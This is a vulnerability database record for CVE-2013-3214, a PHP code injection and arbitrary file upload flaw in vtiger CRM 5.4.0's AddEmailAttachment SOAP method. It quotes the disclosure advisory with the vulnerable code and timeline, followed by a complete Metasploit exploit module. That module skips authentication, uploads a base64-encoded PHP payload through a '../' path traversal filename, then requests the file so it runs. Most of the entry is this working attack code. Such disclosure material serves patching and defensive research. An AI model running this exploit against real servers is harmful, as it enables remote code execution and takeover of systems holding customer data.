ID

VAR-202001-0886

CVE

CVE-2013-3214

TITLE

vtiger CRM  Vulnerability in injection

DESCRIPTION

vtiger CRM 5.4.0 and earlier contain a PHP Code Injection Vulnerability in 'vtigerolservice.php'. vtiger CRM Contains an injection vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. [-] Vulnerability Description: The vulnerable code is located in the AddEmailAttachment SOAP method defined in /soap/vtigerolservice.php: 458. function AddEmailAttachment($emailid,$filedata,$filename,$filesize,$filetype,$username,$session) 459. { 460. if(!validateSession($username,$session)) 461. return null; 462. global $adb; 463. require_once('modules/Users/Users.php'); 464. require_once('include/utils/utils.php'); 465. $filename = preg_replace('/\s+/', '_', $filename);//replace space with _ in filename 466. $date_var = date('Y-m-d H:i:s'); 467. 468. $seed_user = new Users(); 469. $user_id = $seed_user->retrieve_user_id($username); 470. 471. $crmid = $adb->getUniqueID("vtiger_crmentity"); 472. 473. $upload_file_path = decideFilePath(); 474. 475. $handle = fopen($upload_file_path.$crmid."_".$filename,"wb"); 476. fwrite($handle,base64_decode($filedata),$filesize); 477. fclose($handle); The vulnerability exists because this method fails to properly validate input passed through the "filedata" and "filename" parameters, which are used to write an "email attachment" in the storage directory (lines 475-477). [-] Solution: The patch provided by the vendor (http://www.vtiger.com/blogs/?p=1467) doesn't fix completely this vulnerability, because a remote authenticated user can still be able to inject and execute arbitrary code. [*] The vendor was alerted about this when the feedback has been provided. [-] Disclosure Timeline: [13/01/2013] - Vendor notified [06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848 [05/03/2013] - Feedback provided to the vendor [*] [26/03/2013] - Vendor patch released [18/04/2013] - CVE number requested [20/04/2013] - CVE number assigned [01/08/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3214 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-07 . ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rexml/document' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include REXML include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload', 'Description' => %q{ vTiger CRM allows an user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2. }, 'Author' => [ 'Egidio Romano', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3214' ], [ 'CVE', '2013-3215' ], [ 'OSVDB', '95902' ], [ 'OSVDB', '95903' ], [ 'BID', '61558' ], [ 'BID', '61559' ], [ 'EDB', '27279' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { # Arbitrary big number. The payload is sent base64 encoded # into a POST SOAP request 'Space' => 262144, # 256k 'DisableNops' => true }, 'Targets' => [ [ 'vTigerCRM v5.4.0', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 26 2013')) register_options( [ OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/']) ], self.class) end def check test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4))) res = send_soap_request(test_one) unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/ return Exploit::CheckCode::Unknown end test_two = check_email_soap("admin") res = send_soap_request(test_two) if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit file_name = rand_text_alpha(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| soap = add_attachment_soap(file_name, php) res = send_soap_request(soap) print_status("#{peer} - Uploading payload...") if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/ print_good("#{peer} - Upload successfully uploaded") register_files_for_cleanup(file_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end print_status("#{peer} - Executing payload...") send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0) end def add_attachment_soap(file_name, file_data) xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:AddEmailAttachment", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("emailid", {'xsi:type' => 'xsd:string'}) crm.add_element("filedata", {'xsi:type' => 'xsd:string'}) crm.add_element("filename", {'xsi:type' => 'xsd:string'}) crm.add_element("filesize", {'xsi:type' => 'xsd:string'}) crm.add_element("filetype", {'xsi:type' => 'xsd:string'}) crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['emailid'].text = rand_text_alpha(4+rand(4)) crm.elements['filedata'].text = "MSF_PAYLOAD" crm.elements['filename'].text = "MSF_FILENAME" crm.elements['filesize'].text = file_data.length.to_s crm.elements['filetype'].text = "php" crm.elements['username'].text = rand_text_alpha(4+rand(4)) xml_string = xml.to_s xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data)) xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}") return xml_string end def check_email_soap(user_name = "", session = "") xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:CheckEmailPermission", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['username'].text = user_name crm.elements['session'].text = session xml.to_s end def send_soap_request(soap_data) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'), 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => soap_data }) return res end end

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

injection

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Egidio Romano

SOURCES

LAST UPDATE DATE

2024-08-14T13:25:07.584000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE